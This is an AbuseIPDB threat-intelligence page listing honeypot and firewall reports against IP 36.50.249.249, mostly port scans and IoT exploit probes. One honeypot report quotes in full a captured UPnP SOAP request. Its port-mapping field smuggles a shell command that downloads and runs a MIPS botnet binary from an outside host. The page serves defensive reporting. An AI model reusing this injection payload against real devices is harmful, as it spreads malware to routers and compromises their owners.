JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 36.50.249.249

36.50.249.249 was found in our database!

This IP was reported 23 times. Confidence of Abuse is 100%: ?

100%

ISP	Shi Ji Industrial Co., Ltd.
Usage Type	Data Center/Web Hosting/Transit
ASN	AS32595
Domain Name	shijicar.com
Country	🇹🇼 Taiwan
City	Taipei, Taiwan

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 36.50.249.249

Whois 36.50.249.249

IP Abuse Reports for 36.50.249.249:

This IP address has been reported a total of 23 times from 17 distinct sources. 36.50.249.249 was first reported on June 16th 2026, and the most recent report was 41 minutes ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇵🇱 nfsec.pl	2026-06-19 00:55:01 (41 minutes ago)	Detected: TCP scan on port: 8080 with flags: SYN	Port Scan
🇩🇪 Axel	2026-06-19 00:06:40 (1 hour ago)	[2026-06-19 00:06:40 UTC] Honeypot Huawei-specific IoT exploits connection attempt \| AXFRA HONEYPOT	IoT Targeted
🇳🇱 VMHeaven.io	2026-06-18 18:58:27 (6 hours ago)	Blocked by UFW [52869/tcp] Source port: 59213 TTL: 51 Packet length: 44	Port Scan
🇺🇸 MPL	2026-06-18 11:00:23 (14 hours ago)	tcp/2323 (3 or more attempts)	Port Scan
🇬🇧 gbzret4d	2026-06-18 10:45:50 (14 hours ago)	Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (co ... show more Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: / Accept-Encoding: gzip, deflate POST Data: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>; 52869 [2] TCP show less	Hacking Bad Web Bot
🇩🇪 _ArminS_	2026-06-18 05:51:06 (19 hours ago)	SP-Scan 38560:37215 detected 2026.06.18 07:51:06 blocked until 2026.08.07 00:53:53	Port Scan
🇫🇷 Duggy_Tuxy🧱	2026-06-18 04:05:06 (21 hours ago)	[DS-BLKS-PROD01] Blocked by SysWarden Firewall (Port Scan / Probing)	Port Scan
🇫🇷 EDSL	2026-06-18 02:46:48 (22 hours ago)	[SRV-VPN1] Blocked by SysWarden Firewall (Port Scan / Probing)	Port Scan
🇱🇻 instant	2026-06-18 02:30:15 (23 hours ago)	18.06.2026 02:30:15 Command injection vulnerability attempt/scan (login.cgi)	Hacking Web App Attack
🇧🇷 SOC Blue Team	2026-06-18 01:25:58 (1 day ago)	IPs get by Hunting on SIEM	Phishing Web Spam Port Scan Hacking
🇳🇱 ByeByte API	2026-06-17 23:31:01 (1 day ago)	byebyte.space auth: TCP packet to port 52869 (high-risk service) at 2026-06-17T23:31:01Z. Source por ... show more byebyte.space auth: TCP packet to port 52869 (high-risk service) at 2026-06-17T23:31:01Z. Source port 38048. TCP flags: SYN. Packet: 44B, TTL 51, window 4759, IP id 12856. Single packet, dropped at firewall. p0f: OS Linux 2.2.x-3.x (barebone) (generic match), 13 hops, link Ethernet or modem. show less	Port Scan
🇺🇸 xmission.com	2026-06-17 21:44:28 (1 day ago)	Blocked by UFW (TCP on 5555) Source port: 38304 TTL: 50 Packet length: 44 TOS: 0x08 This report (fo ... show more Blocked by UFW (TCP on 5555) Source port: 38304 TTL: 50 Packet length: 44 TOS: 0x08 This report (for 36.50.249.249) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇺🇸 knock	2026-06-17 20:50:21 (1 day ago)	Knock-Knock honeypot brute-force: proto8 (1 total hits)	Brute-Force
🇺🇸 MPL	2026-06-17 17:05:42 (1 day ago)	tcp/80	Port Scan
🇭🇺 bcsaba	2026-06-17 14:53:14 (1 day ago)	Suricata: Alert - ET EXPLOIT D-Link DSL-2750B - OS Command Injection	Web App Attack

Showing 1 to 15 of 23 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 2001:470:1:fb5::248

🇺🇸 216.194.174.116

🇨🇳 183.234.72.66

🇫🇮 147.185.133.143

🇯🇲 66.9.166.240

🇬🇧 37.10.113.213

🇬🇧 35.203.210.225

🇺🇸 20.15.225.33

🇬🇧 193.163.125.101

🇩🇪 167.94.145.19

🇫🇮 147.185.133.41

🇺🇸 143.198.225.197

🇩🇪 142.132.184.199

🇵🇰 139.135.41.227

🇨🇳 116.62.150.183

🇺🇸 104.236.229.227

🇮🇶 91.106.41.245

🇫🇷 85.217.140.52

🇺🇸 64.62.197.17

🇹🇭 58.136.213.46